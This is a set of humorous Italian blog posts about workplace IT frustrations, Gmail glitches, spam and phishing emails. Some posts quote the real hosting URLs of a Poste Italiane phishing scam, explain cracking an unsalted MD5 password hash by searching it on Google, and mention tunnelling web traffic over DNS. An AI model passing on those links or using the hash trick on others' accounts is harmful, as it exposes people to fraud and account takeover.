Per prima cosa bisogna aprire il browser e andare su un sito. Per ragioni di sicurezza, al sito non è stato dato un nome ma solo un indirizzo ip. Da lì metti il tuo identificativo (il numero di matricole) e la tua password (il numero di matricola, per ragioni di sicurezza) e finalmente ti appare la schermata iniziale: un form con gli spazi per scrivere cognome e nome e i campi per indicare giorno mese e anno. Un utonto qualsiasi scriverebbe cognome e nome, e magari si chiederebbe perché il sistema non glieli ha già messi: anche quella è probabilmente una procedura di sicurezza. Quello che bisogna fare è selezionare la data per cui si vuole fare la rendicontazione, e poi cliccare su un'iconcina con una lente, nascosta in alto a destra. In questo modo appare come per magia una riga con il proprio nome e cognome, e un'altra iconcina, stavolta a forma di floppy, su cui cliccare.
Finalmente arriva la schermata con i dati, e il primo messaggio automatico di errore: Matricola xxxxxx per il ggmmaaaa non e' stata schedulata. Scegliere un nuovo turno.. C'è un misero singolo campo in cui bisogna indicare il codice del "turno": dal lunedì al venerdì si scrive 451 (Fahrenheit?), il sabato 57 e la domenica 61. Sì, il sistema non si fida di calcolare automaticamente qual è il giorno della settimana: metti che nel corso della sua validità si faccia una riforma del calendario... sarebbe tutto da buttare, no?
Si conferma il dato, e compare il secondo messaggio automatico di errore: Quadratura non Ok. Il sabato e la domenica non ci sono grossi problemi: basta ricliccare su "conferma", partendo dal principio che uno può cliccare per sbaglio una volta, ma se lo fa due volte o è un idiota o vuole proprio fare così. A questo punto si può tornare indietro, riselezionare una data, ricliccare sull'icona con la lente e poi sull'icona con il floppino, che sembra assolutamente identica a prima ma si è magicamente settata per la nuova data.
Nei giorni in cui si doveva effettivamente lavorare, la procedura è un po' più complicata. Io faccio una sola timbratura al giorno, quindi significa che tutti i giorni convenzionalmente lavoro per sette ore e trentotto minuti: ergo c'è uno dei millanta campi che sono apparsi come per magia dove devo scrivere "0738". Ma poi devo indicare su cosa avrei lavorato: c'è un altro apposito campo, "Codice Lavoro". Anzi no, ce ne sono due: quello giusto mi hanno detto che è "Dati relativi ad attività Artemis", e non quello "Dati relativi alle Indisponibilita" (senza accento, sì). Per nostra comodità sono già indicati tutti i codici possibili di attività, preparati addirittura con quello che ha tutta l'aria di essere un carattere di controllo al loro interno (si sa, scegliendo da un elenco predefinito potresti sbagliarti). Ovviamente tu non sei costretto a sapere a memoria qual è il codice per il tuo lavoro, e si può cliccare su un bottoncino per vedere la lista: per favorire l'usabilità, il bottoncino è contrassegnato da una "X", che quindi non sta per "chiudi", ma per "eXcellent, my dear Watson!" Se fai un'assenza, però, non c'è l'aiutino: devi andare a caccia di un file, gestito religiosamente da Chi Conosce Il Sistema, con tutte le sigle. Epperò non ci credete, ma confermando il dato funziona tutto!
PS: bisogna però essere onesti. Per il futuro, uno può già schedulare il proprio lavoro, e spiegare al sistema quali giorni sono lavorativi e quali no. L'unico problema è naturalmente che devi ricordarti di delezionare i giorni già selezionati: la bilocazione gliela lasciamo a Padre Pio.
PPS: l'avrete già immaginato tutti: sono ventun anni e rotti che devo fare una rendicontazione, e sono ventun anni e rotti che la correlazione tra quanto scritto e quanto fatto è nella migliore delle ipotesi nulla.
PS3: In questo momento non posso collegarmi al sistema, perché mi dice Utente non riconosciuto: User 'xxxxxx' already Logged. Ma se cerco di inserire i dati, mi cazzia con Utente non autenticato! Vai alla pagina di login. Perfetto, no/

Occhei, non venitemi adesso a dire "ma quella è la memoria virtuale, non è l'occupazione vera e propria di memoria", perché posso sempre farvi vedere questa.
Garantisco che questo pc non si sentiva affatto bene ;-)

Stamattina d'un tratto Gmail ha deciso di non funzionare, nel senso che se clicco sopra un messaggio non me lo apre, se provo a cliccare su un folder non me lo apre, eccetera eccetera. Però ad esempio se clicco su "seleziona tutto" vengono effettivamente selezionati tutti i messaggi: quindi sono solo relativamente poche le azioni che non fa. Peggio ancora, se ad esempio posiziono il puntatore su un messaggio, questo si trasforma in un ditino, proprio come un link: è solo il clic che non fa nulla.
Ho provato la tecnica dell'informatico: nulla. Ho disabilitato Better Gmail: nulla.
Sempre peggio: facendo uno strano giro per arrivare ai setting gmail (mica posso cliccare sulla pagina!) mi arriva questo minaccioso messaggio:
We’re sorry, but your Gmail account is currently experiencing errors. You won’t be able to use your account while these errors last, but don’t worry, your account data and messages are safe. Our engineers are working to resolve this issue.
ma se uso (ehm...) Internet Explorer funziona tutto.
Mo' che faccio?
Aggiornamento: (21 febbraio) Lunedì era tutto a posto, ma stamattina è di nuovo bloccato. Giovedì Guai Gmail, insomma.

La prima versione della notiziola precedente è stata pubblicata alle 14:25 (non guardate l'ora indicata: è quella in cui ho iniziato a scriverla). La prima persona che l'ha letta è un mio lettore abituale, a giudicare dai log di lloogg - non so chi sia, e comunque non lo direi - alle 14:32. La prima persona che l'ha letta come risultato di una ricerca su google è arrivata alle 15:02; poi ce ne sono stati parecchi, ma questo lo immaginavo, ho scritto la notiziola apposta per avvisare e rassicurare la gente.
Quello che non mi immaginavo è che Google si prende la briga di verificare se questo blog ultraperiferico è stato aggiornato con una frequenza assolutamente incredibile. Sì, potrebbe esserci stato il colpo di fortuna che il giro del suo ragno stava giusto passando da me, ma già in altri casi avevo notato che l'aggiornamento avveniva in poche ore. Se ci pensate, la cosa fa davvero paura.

La mia connessione wifi continua ad andare su e giù, impedendomi praticamente di vedere una pagina web se non caricandola tre o quattro volte (e per fortuna che non guardo dei video). La lista delle reti wifi mi dà cinque reti oltre la mia, e sono ragionevolmente certo che a quelle reti si aggiunge ad esempio il ripetitore Sky dei miei vicini, che so che usa le stesse frequenze. La cosa peggiore è che c'è qualche sistema che cicla tra i vari canali a disposizione, a giudicare dalle verifiche che ho fatto sul mio router: è esattamente l'equivalente di quelli che continuano a cambiare corsia durante un ingorgo in tangenziale, col risultato che l'ingorgo aumenta ancora di più.
Insomma, viviamo in una congestione perenne.

Lunedì scorso è stata pubblicamente lanciata la versione alfa di Wikia Search, un progetto di Jimmy Wales (quello di Wikipedia, per chi non lo sapesse) per un motore di ricerca "user defined". Potete trovare un commento dalla Tartaruga Tecnologica, e una stroncatura (in inglese) su TechCrunch. Vorrei aggiungere qualcosa di mio, ma non è così facile, visto che non sono riuscito a trovare molte informazioni nel sito. Indubbiamente come motore di ricerca al momento non serve a molto, le pagine indicizzate sono troppo poche. È stata molto strombazzata l'interazione col wiki, nel senso che puoi iscriverti come utente a wikia, però al momento mi pare proprio che la cosa non serva a molto, o almeno non sono riuscito a farci nulla. Sì, ci sarebbe il MiniArticle, ma mi pare ancora un concetto fumoso. Magari lo provo su di me :-)
D'altra parte posso immaginare degli sviluppi interessanti in un "social websearcher". Ad esempio, se io ho una graduatoria di amici (e amici di amici, tipo Linkedin) e posso dare un voto ai risultati delle ricerche che ho fatto, i miei amici potrebbero vedere i risultati "buoni" (buoni per me, ma l'idea del social network dovrebbe essere proprio questa) pompati un po' di più, e quelli "cattivi" più giù nella lista. E probabilmente un cluster di amici riuscirebbe a fare un motore personalizzato per loro all'interno di quello globale, e magari pubblicizzarlo come "motore orientato al progetto XY" (che siano Pokemon, satira contro il governo Prodi II o chissà cos'altro). Naturalmente dal dire al fare c'è di mezzo il mare, ma anche quando nacque Wikipedia non si sapeva se e come sarebbe riuscita a crescere. Mi sa però che su una cosa TechCrunch ha ragione: c'è stata troppa attesa su Wikia Search, e la cosa non è stata affatto buona.
Per par condicio dovrei parlare di Knol, però preferisco aspettare che ci sia almeno un'alfa, e non sono vaporware. Tanto lo so che siete buoni e mi perdonerete.

In Telecom sono costretto a cambiare password al pc ogni tot mesi (tre o quattro, non ricordo), per "evidenti ragioni di sicurezza". Con un bellissimo sistema automatico, la password per accedere al mio PC viene copiata come password di rete, e quindi devi ricordare solo una password e non due.
Generalmente, qualche giorno prima della scadenza della password, il sistema ti avvisa della cosa, e tu puoi cambiarla con tutta tranquillità. Stavolta non è capitato, o forse il fatto che dieci giorni fa avessi detto via webmail "no, non la cambio adesso" ha bloccato tutti gli altri avvisi. Sta di fatto che stamattina quando ho tentato di collegarmi sono stato bloccato e invitato a cambiare password. Va bene, dico io, ecco qua la password vecchia ed ecco qua e qua la password nuova. Aspetto cinque, dieci, trenta, sessanta secondi e compare un'altra finestrella d'errore: "Non posso contattare il dominio TELECOMITALIA". Riprovo da capo (è lunedì mattina, non potete pretendere chissà quali lampi di genio dal sottoscritto): stesso risultato. Poi prendo il caffè e mi viene un'Idea Meravigliosa. Mi metto davanti al PC di un collega che era ancora giù alla macchinetta, faccio login col mio utente e la mia password, mi arriva il messaggio di errore "your password has expired", cambio password, e voilà, tutto a posto prima che il collega ritorni in ufficio.
Il caffè aveva stimolato i miei neuroni a sufficienza per immaginare che anche la password di dominio era contemporaneamente scaduta, e quindi non riuscivo a entrare per cambiare password. Comma 22, appunto. Non ci vorrebbe molto per evitare questi problemi: basterebbe far durare la password di dominio dieci giorni più di quella locale. Ma come forse ricordate non è possibile parlare con i gestori della sicurezza in Telecom...

Lo dice Suzukimaruti. Lo dice Ilaria. Mediaworld ha messo in catalogo online l'Asus Eee. Trecento euro (negli Usa è trecento dollari :-( ).
Per chi non lo sapesse ancora, l'Eee è un subnotebook, il che significa che è piccolo e leggero, non come un palmare ma comunque qualcosa che si può portare in giro più facilmente di un notebook. Ovviamente le risorse hardware sono ridotte, ma come sistema per prendere appunti a una riunione o guardare un film è perfetto.

Come Larsen ricorda, sono giusto vent'anni da quando Larry Wall annunciò (su Usenet, mica albicocche artiche...) la versione 1.0 del suo Pathologically Eclectic Rubbish Lister, per amici e nemici Perl.
Io ci sono tanto affezionato, anche se non è che ormai programmi più di tanto (leggasi: per nulla), e volevo condividere con qualcuno la gioia per questo anniversario!
Aggiornamento: non posso non citare Perl Buzz che ha preparato una canzoncina al riguardo:
It was 20 years ago today
Larry Wall taught some text to play
It's been going in & out of style
But it's stuck around for quite a while()
So may I introduce to you
The tool you've loved for all these years
Larry's Practical Extract & Report Laaaanguage
(l'ultima riga funziona maluccio come metrica, mi sa)

Stanotte Giuseppina mi scrive preoccupata perché, dopo avere spedito un'email a una lista a cui siamo entrambi iscritti, le è tornato indietro un messaggio dall'aria minacciosa, messaggio che allega alla sua mail.
Premetto che il suo messaggio originale commentava la "festa per Jannacci" che Radio Popolare ha organizzato sabato scorso, e c'era un link appunto alla presentazione dell'iniziativa.
La risposta che le è tornata era di Antigen, il controllo antivirus del server Exchange di fiat.com: diceva che il messaggio era stato "purged" - che non significa "emendato", ma direttamente "cancellato" - nonostante il campo "X-MIRsrl-MailScanner:" affermasse "Sembra essere pulito" (sì, in italiano). E qual era allora il crimine commesso da Giuseppina? Avere usato all'interno del mail la parola "casino". La frase incriminata, per la precisione, era «Un casino di gente di tutti i colori possibili».
Naturalmente - anche se confesso di non esserci arrivato subito, ma in fin dei conti è lunedì mattina - non è che i vertici Fiat abbiano avuto un improvviso sussulto di puritanesimo: molto più prosaicamente, la loro idea di base è stata quella di eliminare gli spam che promuovono i "casino on line". Peccato che siano stati un pelo troppo aggressivi nella definizione dei filtri, visto che quello era l'unico termine sospetto nell'email. O magari lo fanno apposta, così uno ha una scusa per affermare "no, la tua email non mi è mai arrivata"...

Ieri pomeriggio verso le 18 finisco di rivedere una parte della traduzione (questa volta non mia) di un capitolo, invio il mail - senza allegato perché sono lesso - al team e me ne esco. Rientro dopo un'ora e Anna mi fa "guarda che non funziona la connessione di rete". Contemporaneamente mi arriva un SMS di Loris (il mio provider) che mi dice "prova a spegnere e riaccendere il router, perché non riesce ad autenticarsi". Eseguo la solita operazione informatica, ma nulla da fare. Comincio a guardare la configurazione del router, ma non vedo nulla di strano, e comunico la cosa per telefono a Loris. Lascio tutto fermo, e dopo un po' mi arriva un altro messaggio: "prova a cambiare server e usare blu invece che bianco". In effetti, dopo averci pensato un po' su per ricordarmi dove diavolo è cablato il nome del server, è funzionato tutto a meraviglia.
Cosa è successo? non si sa, però i due server autenticano in maniera diversa e si vede che il mio router ha le paturnie. Nulla di male. Però immagino capiate perché preferisco pagare un po' di più per una connessione ADSL che è solo da 2 mega: volete mettere avere qualcuno che alla sera di un giorno festivo (ieri era sant'Ambrogio...) ti rimette in sesto le cose? Quanto vale tutto ciò?

Anche se ormai slashdot sembra sempre più simile a Dagospia, ogni tanto c'è qualche notizia interessante. Oggi, ad esempio, parlava di un nuovo sistema antispam, sviluppato dalla Abaca. La tecnologia usata è spiegata qua: in pratica, per decidere se un messaggio è spam oppure no si guarda a chi lo riceve. Non ridete: la cosa non è così stupida come sembra a prima vista.
Il razionale di Abaca è più o meno questo: se io ricevo tanto spam in percentuale e mi arriva un messaggio, questo probabilmente è spam; se ne ricevo poco, probabilmente non è spam. Intendiamoci: le affermazioni "matematiche" di quella pagina fanno ridere, dall'affermazione che «questo è un fatto garantito matematicamente, che non può essere messo in difficoltà da uno spammer» all'idea che un'efficacia del 99% sia «con da dieci a cento volte meno errori di ogni altro sistema disponibile» - in effetti, partendo da un messaggio spam su 100 non filtrato, un sistema con cento volte più errori è un sistema che non filtra nulla. E naturalmente un sistema di questo tipo non può per definizione funzionare con una singola casella email, ma deve essere gestito su una base dati piuttosto ampia, come quella di un ISP; però potrebbe essere un'utile aggiunta alle altre tecniche antispam, per semplificare la distinzione tra i siti che mandano molta posta in maniera lecita e gli altri.

È da ieri che mi arrivano dei commenti spam da "robot@google.com" (IP 216.240.129.180) con testo "Hello, nice site :)" e mittente "Brin <robot@google.com>". La cosa strana è che non c'è altro; nessun link né esplicito né implicito.
A parte che mi piacerebbe scoprire come diavolo si fa con MT4 a bloccare automaticamente IP e range di IP, mi chiedo la logica di tutto ciò. Forse che spera in questo modo di fare poi passare dei trackback?

Sul blog Light Blue Touchpaper ho trovato un metodo molto interessante per recuperare una password (di Wordpress, per la cronaca: il blog era stato craccato a partire da un account Wordpress, e il tipo voleva sapere qual era la password di quell'account). La piattaforma di blog, infatti, salva sì la password in maniera crittata - per la precisione, calcola un hash MD5 e mantiene in memoria quello, ma il concetto di base è quello - ma non lo fa con un po' di sale in zucca. Fuor di metafora, non aggiunge il salt, cioè un certo numero di caratteri casuali per far sì che due password uguali non vengano codificate allo stesso modo. Che ha fatto allora Steven, l'autore del blog? Ha provato a inserire l'hash MD5 su Google, e ha trovato varie pagine, che avevano il nome "Anthony" all'interno. E in effetti, la password era proprio Anthony!
Per semplificare la vita a chi vuole divertirsi in quel modo, uno dei lettori del blog ha scritto una pagina web che a partire da una parola vi dà i link da provare. Lascio al vostro intuito sherlockiano immaginare a che corrisponde 851cd3a23a913f9b88550bcd055e040a ...
ps: il sito utilitymill.com è utile di suo :-)

A proposito di tecnologia che mi si rivolta contro: stamattina sono arrivato in ufficio, ho acceso il pc, e invece di vedere la solita lucina verde se n'è accesa una rossa. Sul monitor è apparsa la minacciosa scritta "Le ventole non ventolano, io mi spengo" o qualcosa del genere in inglese, ed effettivamente il pc si è spento subito dopo. Io sono un ottimista, ho riprovato ad accendere il pc, ma il risultato è stato lo stesso.
Dopo il caffè obbligatorio per far partire i miei due neuroni e prima di arrischiarmi a fare il numero verde dell'assistenza delocalizzata, ho spostato a fatica il pc e ho soffiato con forza. Risultato: è ripartito come se nulla fosse. È bello sapere di essere una persona di qualche utilità spirometrica.

Il phishing sulle poste di stamattina aveva l'interessante titolo "Pagamento sospetto" e diceva
«Abbiamo ricevuto un accredito sospetto di 56,12 ? [sic. Il simbolo dell'euro è difficile da fare, mi sa tanto] il giorno 31/05/2007 dal conto online di un altro nostro cliente alle ore 06:31. L'accredito è stato temporaneamente bloccato a causa delle fasce orarie, ora verrà verificato e successivamente accreditato sul suo conto.»
Sicuramente gli ignoti phisher conoscono perfettamente come funzionano le Regie Poste Italiane, visto che "il pagamento sospetto" sarebbe di più di cinque mesi or sono. Ma quello che è più favoloso è il concetto di accredito bloccato "a causa delle fasce orarie". Ora mi aspetto che qualcuno inventi gli accrediti a senso unico alternato...

Ho appena letto su Slashdot che Google stava modificando l'interfaccia utente di gmail - vedi anche qua, e circa l'un percento degli utenti aveva già la versione nuova. Il mio neurone numero 1 (Chip) ha detto "oh", e ha detto al mio neurone numero 2 (Dale) "l'avevi visto, che il colore della freccetta More Action era cambiato, no? E l'avevi visto, che certi font erano un po' strani, no? Perché allora hai pensato che ci fosse un problema di visualizzazione del tuo browser, invece che correre a fare l'anteprima e fregare tutti gli altri blog?"
Vabbè, è andata così. Però, adesso, scusatemi. Guardate la schermata "prima della cura" e quella "dopo la cura"; ora se ci riuscite trovate le dieci piccole differenze. D'accordo, in alto a destra c'è scritto "older version" e "newer version". Ma come faceva ad accorgersene una persona che come me ha sviluppato un sistema per cancellare mentalmente le pubblicità che Google inserisce in Gmail?

Prima di pranzo, mi ero accorto che Firefox aveva dei problemi - banalmente, non riuscivo ad aprire un nuovo tab scrivendo esplicitamente l'indirizzo. Non mi sono preoccupato più di tanto, l'ho ammazzato e me ne sono andato a mangiare.
Dopo pranzo, prima di farlo ripartire, ho voluto dare un'occhiata al task manager per verificare che fosse effettivamente stato fatto fuori. Risultato: nella lista delle applicazioni in effetti non c'era; in quella dei processi non c'era il solito porcellino dai 100 ai 300 MB di RAM, ma in compenso c'erano diciassette istanze di firefox.exe, intorno ai 2-3 MB ciascuna. Non so, ma secondo me è tutto parte di un piano di Mozilla per assimilare tutti gli altri processi del PC!

Venerdì scorso mi ero accorto che FeedBurner era stato bloccato dal firewall aziendale. Vabbè, mi dico, la cosa non è poi così importante. Lunedì sento il mio amico Ugo che mi fa "ma lo sai che non ti si aggiorna più il feed del blog?" al che io gli rispondo "no, il problema è sul nostro firewall". Lui fa una rapida verifica, e lo sento lanciare tutta una serie di epiteti, perché una serie di siti che gli servono per lavoro avevano anch'essi il feed sotto feedburner. Stamattina mi accorgo che FeedBurner è di nuovo raggiungibile. Visto che immagino che Ugo non abbia molti santi in paradiso, l'ipotesi più probabile è che esista qualche megadirigente che sa usare i feed, si sia trovato bloccato come me, e abbia immediatamente fatto chiamare le persone giuste. Se ci pensate su, non è poi così male.
D'altra parte, i nostri sistemi informativi aziendali sono sempre un po' "personali". Il mio PC si connette ad esempio alla rete con il dominio TIM-NT, il che non è così strano visto che stavo in Tim. Ci sono arrivate con cadenza regolare sette-otto mail che dicevano "stiamo facendo la migrazione al dominio TELECOMITALIA; la cosa avverrà automaticamente, e voi dovete solamente ricordarvi di non spegnere il calcolatore ma lasciarlo in stato di logoff. Finalmente ieri la mail era leggermente cambiata, e diceva "la migrazione è terminata. Se abbiamo lasciato dietro qualcuno, lo invitiamo a chiamarci al numero verde 800-xxxxxx". Come i più attenti di voi avranno intuito, il mio PC continua a connettersi come TIM-NT. Chiamo il numero verde, e mi salta la linea mentre sto spiegando la situazione: risultato, due mail, una con la notifica di apertura del ticket e una con la notifica di chiusura con motivazione: CADUTA LINEA PER PROBLEMA AVAYA. Richiamo il numero verde, stavolta arrivo in fondo e gli do tutti i dati possibili e immaginabili tranne il nome del file di sfondo del mio desktop. Ieri sera lascio coscienziosamente il PC acceso in logoff, e stamattina... (ve lo devo proprio dire? non ci arrivate da soli?)
Aggiornamento: (17 ottobre) in compenso hanno bloccato YouTube :-) (e ribloccato feedburner :-( )

Lo so. I colori di questo blog fanno schifo. D'altra parte, come scritto da Stefano Mazzocchi, fare le interfacce è una delle aree in cui potrei avere grandi margini di miglioramento se solo ci capissi qualcosa.
Al momento qui ci sono cose molto peggiori, tipo il fatto che le due colonne del blog diventano una sola per chi usa IE6 (non so su IE7), e non so assolutamente se funzionano ancora tutti i feed RSS. Ciò detto, confesso che comunque non ho nessuna voglia di provare schemi di colori, anche perché non è affatto detto che il risultato sarebbe un miglioramento. Quindi, lancio il Grande Concorso di cui al titolo.
In pratica, chi vuole può chiedermi i miei file screen.css e base_theme.css e modificare i colori. Preparerò una pagina con tutti i risultati ottenuti, e poi potrete scegliere quella che volete vedere nel blog. (Se qualcuno mi spiega come si fa ad avere più template, posso anche metterle tutte :-) ) L'unica cosa che si vince è la mia riconoscenza, e la segnalazione nei ringraziamenti in basso. Tenete conto che non ho voglia di cambiare la struttura del blog: l'unica cosa che vorrei fare è togliere un po' di spazio tra gli item nella colonna di destr... ehm, quelli giù in fondo per chi ha IE. Sono degli item, per la cronaca.

Aggiornamento: Il css di base è banalmente
@import url(base_theme.css);
@import url(screen.css);
i due file sono rispettivamente qua e qua.
Mandare il template è un casino, perché ci sono include su include...

Dopo tutta la fatica che ho fatto per reinstallare XP sul pc di Anna, tornato a casa ho scoperto perché funzionava così male: semplicemente è partita la schedina WiFi interna. Naturalmente l'ha fatto in maniera creativa: si accorge perfettamente delle varie reti presenti, e afferma anche di stare connettendosi. Peccato resti in modalità send-only, e non si veda nessun pacchetto ritornare indietro: questo sia nel caso io cerchi di ottenere un indirizzo via DHCP che quando glielo forzo io. Ovviamente, essendo il PC di Anna e quindi comprato con fattura, la garanzia è già scaduta: e comunque abbiamo già avuto a che fare con l'assistenza Packard Bell, e preferirei non ripetere l'esperienza.
Al momento il problema non è così importante, visto che avevo acquistato preventivamente un dongle USB che funziona perfettamente; però adesso mi ritrovo con una moglie che giustamente si lamenta perché le ho comprato una ciofeca... e vi assicuro che non è una bella sensazione.

Mi è appena capitato di passare a vedere uno dei miei account google che generalmente non uso, ma tengo per vari scopi. Già mi ha stupito che contenesse più di trecento messaggi di spam, visto che una ricerca con nome_account@google.com non ritorna nessun risultato, e quindi quell'indirizzo - che ripeto non uso - dovrebbe essere sconosciuto.
Ma la cosa più divertente è un'altra. Visto che l'account non lo uso, non ci ho mai tolto le web clips: è vero che sono ulteriore pubblicità, ma appunto è ininfluente. Bene: quando ho aperto le schermate del folder spam, le web clips puntavano a... ricette con lo spam :-)

Qui in ufficio avevo sei-sette CD Verbatim, sedicenti DataLife, dove ci sarebbe stato un backup di dati del mio vecchio PC; il backup risale a un paio di anni fa, prima di una formattazione, ma la roba è molto più vecchia. Mercoledì mi è venuto in mente che c'era qualcosa che mi poteva servire al volo, e metto un disco nel lettore. Risultato: secondo il lettore (ma non solo quello del mio pc... ho provato anche da un collega) tutti quei CD non hanno dati. Le proprietà dicono proprio "Contenuto totale: 0 byte".
Non è un problema insormontabile: è tutta roba che sta ancora all'interno di un altro hard disk a casa. I backup li faccio per bene, le rare volte che li faccio. Però diventa un problema di principio. Qualcuno laggiù mi consiglia un programma che provi a tirare fuori qualcosa da questi cd?

Il DNS di per sé sarebbe il sistema che i computer usano per capire qual è l'indirizzo IP corrispondente al nome di un sito (occhei, c'è molto di più... ma chi lo sa già è inutile lo legga qua). Questo significa che è una parte davvero fondamentale, anche se poco visibile, di Internet. Non è quindi un caso che degli hacker abbiano provato a fare di tutto con il DNS: una decina di anni fa era persino stato fatto un'adventure (testuale) che veniva giocata attraverso il DNS. Però mi mancava un sistema per accedere alle pagine web via DNS. Detto così forse non è chiaro: in pratica, anche se vi bloccassero l'accesso al web potreste comunque leggere le vostre pagine tranquillamente.
Non che la cosa sia semplice: dovete avere un server da qualche parte a cui potete accedere e inserire uno script, il vostro client deve avere installati perl e ssh, e la velocità non è esattamente quella cui siete abituati (anche con un modem 28.8, intendo). Però volete mettere la soddisfazione?

Leggo da Slashdot della nuova statistica sull'uso dei browser in Europa di cui avevo parlato tre mesi fa. Rispetto alla scorsa rilevazione, l'uso europeo di Firefox è passato dal 24.1% al 27.8%, un bel salto. E in Italia? Siamo saliti, si fa per dire, dal 15.5% al 18.3%, meno quindi della media europea. Però ci sono buone notizie. Tre mesi fa avevamo dietro solo Olanda e Danimarca, stavolta siamo riusciti a superare l'Ucraina. Qualcuno può farlo sapere a Prodi, che così potrà fare sapere a tutti il grande successo della nostra nazione?
Ah: le mie statistiche non fanno testo. In tutto il sito, Firefox fa il 32% contro il 33% di IE (più 5% di altri browser, il resto sono i programmi automatici di ricerca e fetch) mentre sulle notiziole Firefox fa quasi il doppio di IE, anche escludendo i macchisti.

Era un po' che non ne vedevo più, e mi chiedevo come mai i phisher avessero saltato questo simpatico sistema. Ma stamattina gmail mi ha riportato - senza nemmeno metterlo nello spam - questo messaggio da parte di "accrediti@poste.lt", dal titolo "L'accredito ricevuto e' stato temporaneamente bloccato." Notate la presenza dell'apostrofo al posto dell'accento, un buon miglioramento rispetto alle lettere senza accento o alle lettere cirilliche che a volte capitano. Ma notate bene l'indirizzo: non è affatto farlocco, e credo proprio esista davvero. Il trucco c'è, ovviamente: il sito non è "poste.IT" ma "poste.LT", cioè un sito lituano. Erano appunto anni che non mi capitavano più...
Il messaggio di per sé arriva da apache@realsys.hu, ed è formato da un semplice jpg, ospitato a http://www.munillinois.org/scripts/calendar/e1u2r9o.jpg e che ho salvato da me. Il link è sulla directory "calendar" che rimanda a http://www.gymcan.org/%20/%20/bancoposta.online.it/bpol/cartepr/ , per la cronaca. Le lettere accentate nel testo, pardon nell'immagine, ci sono, anzi ce ne sono un po' troppe; ed è sempre l'ufficio postale di Brandizzo ad essere impelagato, tanto che il ridente paesino sta per superare Pinerolo nell'apposita classifica. Però il tutto mi fa pensare che il phisher sia qualcuno di nuovo... che bello, un po' di novità fa sempre bene!

Leggo da Slashdot di una gara, lo Hutter Prize for Compression of Human Knowledge, per comprimere quanto più possibile i primi 100 MB di Wikipedia. Non ho ben capito se quei 100 MB sono sempre gli stessi o vengano aggiornati non dico alla velocità dell'enciclopedia ma comunque con una certa quale frequenza, per evitare tecniche risolutive legate a uno specifico file: ad ogni modo, un fattore di compressione senza perdita di informazione superiore a 6 è sicuramente un ottimo risultato.
Dire però come fa slashdot che gli 1,319 bit per carattere, vicini al limite superiore della stima di Shannon per la capacità umana (0,6-1,3 bit per carattere) sia un segno che si stia arrivando all'intelligenza artificiale. Non tanto perché gli esseri umani codifichino le informazioni in maniera "lossy", perdendo cioè informazione; se uno va a leggere come Shannon ha fatto la sua stima, mostrando un testo ad alcuni volontari e chiedendo "qual è la lettera successiva?", capisce che non è quello il caso. Il vero punto è quello che si vede anche nei computer che giocano a scacchi: è (relativamente) facile riuscire a programmare un computer in un particolare campo e farlo diventare meglio di tutti gli uomini e le donne, ma per fargli passare il test di Turing occorre che raggiunga un livello anche solo "bassino" ma in generale. Noi si aspetta senza fretta.

Gmail, se uno si posizionava nella cartella Inbox, indica nel titolo quanti messaggi nuovi erano presenti: invece che scrivere "Gmail - Inbox", si legge ad esempio "Gmail - Inbox (4)". La cosa è comoda se si hanno relativamente poche finestre attive, perché nella barra di stato si può vedere immediatamente se c'è qualcosa di nuovo. Peccato che quelli come me che di finestre ne hanno a pacchi non potevano utilizzare appieno la cosa, perché vedevano scritto "Gmai...".
Non più! La nuova versione di Better Gmail - ovviamente solo per chi usa Firefox, ma d'altra parte perché uno non dovrebbe usarlo? - sostituisce il titolo con "4 unread - Gmail Inbox" che riesce a dare informazioni anche a quelli come me. È proprio vero che l'usabilità è anche composta di minuzie.

Non so come mai, ma ultimamente mi sono arrivati un po' di avvisi "c'è una cartolina per te", tentativi di virus che pensavo fossero terminati cinque anni fa perché non ci credeva nessuno.
In questo caso però non era un mio "amico" a scriverla:
Your worshipper has sent you an ecard from postcards.org.
È bello avere qualcuno che ti adora, no?
Per la cronaca, il sito - non raggiungibile - è 89.41.98.182, che fa parte di un pool di indirizzi @moldtelecom.md cioè dalla Moldavia (o Moldova che dir si voglia). Devono proprio stare lontani, per riuscire ad adorarmi!

in questo momento, l'ultima riga di log indicata da lloogg è la seguente:
http://10.132.104.136:82/prc0/0/231/igtime82625.3589997999 from direct url (no referer)
83.224.64.9 Italy 1280x1024 MSIE 6.0 running on Windows XP x64
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
22:51:58 Jun 27
Notate che la prima riga non dovrebbe essere quell'indirizzo, ma indicare una pagina del mio sito, e più precisamente di queste notiziole. Non uso indirizzi 10.132.*. Idee?

(una ricerca sui log con quell'indirizzo IP mi ha fatto trovare come referrer anche http://wap.omnitelvodafone.it/cae/jpc/. Sarà il WAP che fa casino come da sua definizione, oppure lloogg che si è svegliato male?

Stamattina ho scoperto che, se solo lo volessi, potrei iscrivermi a Google Web History. Secondo il blurb pubblicitario - non so perché, ma la pagina di help indicata non mi si apre - avrò accesso diretto a tutto il testo delle pagine che ho cercato, insieme alla possibilità di togliere quelle che non mi sono piaciute dallo storico e soprattutto potrò fare la statistica oraria delle mie ricerche! (non scherzo, è proprio pubblicizzato così).
Ora, non ci vuole molto a capire che Google in questo modo avrebbe un controllo ancora maggiore sui miei interessi, e potrà mandarmi pubblicità ancora più mirate (non che io ci clicchi su, ma il principio è quello). E che ci guadagno, io? vedere cosa avevo cercato sei mesi fa e non mi ero salvato? Non so, ma non credo che mi iscriverò a quel servizio

Magari c'è qualcuno che ha letto questo articolo di Rep.it sui "4500 siti turistici italiani infettati" e si è chiesto quanto c'è di vero.
Qualcosa c'è: per gli anglofoni, guardate cosa dice Trend Micro, Websense, Symantec (quest'ultimo scriveva della cosa già venerdì, ma probabilmente nel weekend qui da noi c'era altro da fare). Questo "The Italian job" è così pericoloso? è probabile, anche se ovviamente tutti i link che ho citato parlano pro domo sua e quindi cercano di ingigantire il problema. Ma anche Rep. sembra avere la sua bella convenienza: altrimenti, perché avrebbe scritto «Ma solo chi naviga in Internet con una vecchia versione del browser Explorer è vulnerabile al virus. Per contrastarlo si deve aggiornare la versione di Explorer andando sul sito www.microsoft.com.»? Sì, lo so che ci sono tutti quelli che navigano in Internet senza usare Windows oppure senza usare IE; e lo so che a Rep. probabilmente se ne dimenticano facilmente. Ma era anche necessario fare la marchetta per IE7?
Aggiornamento: ora che ne parla anche il Corsera, mi sa che l'avviso non era una marchetta ma semplicemente una versione italianizzata di quanto scritto sul sito della Trend Micro.

Non sto parlando della vignetta odierna di User Friendly (per chi non conosce il contesto: stiamo ricordando i trent'anni dall'uscita dell'Apple ][, la cui RAM raggiungeva la ragguardevole dimensione di 48 KB), ma di una cosa molto più terra terra.
